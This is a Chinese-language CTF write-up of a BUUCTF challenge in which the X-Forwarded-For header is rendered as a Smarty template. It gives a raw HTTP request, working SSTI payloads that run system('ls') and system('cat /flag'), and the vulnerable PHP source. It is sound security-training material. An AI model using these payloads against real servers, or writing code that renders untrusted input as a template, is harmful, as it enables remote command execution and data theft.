本題考察XFF頭的ssti模板注入,沒有過濾,算是入門題
進入題目hint.php的源碼中可以看到一個hint
猜測是通過XFF頭來獲取信息的,發個HTTP請求添加一個XFF頭測試一下:
GET /flag.php HTTP/1.1 Host: node3.buuoj.cn:25656 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh,zh-CN;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 X-Forwarded-For: test
可以看到此時顯示的IP已經變了,猜測存在ssti,構造一個表達式Payload測試一下:
X-Forwarded-For: {{system('ls')}}
可以看到服務器執行了我們的命令,直接cat /flag即可獲得Flag:
X-Forwarded-For: {{system('cat /flag')}}
做出題之后再來分析一下這道題的源碼,看一下flag.php的源碼:
<?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $smarty = new Smarty(); if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip=$_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip=$_SERVER['REMOTE_ADDR']; } //$your_ip = $smarty->display("string:".$ip); echo "<div class=\"container panel1\"> <div class=\"row\"> <div class=\"col-md-4\"> </div> <div class=\"col-md-4\"> <div class=\"jumbotron pan\"> <div class=\"form-group log\"> <label><h2>Your IP is : "; $smarty->display("string:".$ip); echo " </h2></label> </div> </div> </div> <div class=\"col-md-4\"> </div> </div> </div>"; ?>
形成ssti的代碼在這里:
$smarty->display("string:".$ip)
采用了Smarty模板引擎,導致了ssti,關於Smarty模板ssti可以參考這篇文章:https://www.jianshu.com/p/eb8d0137a7d3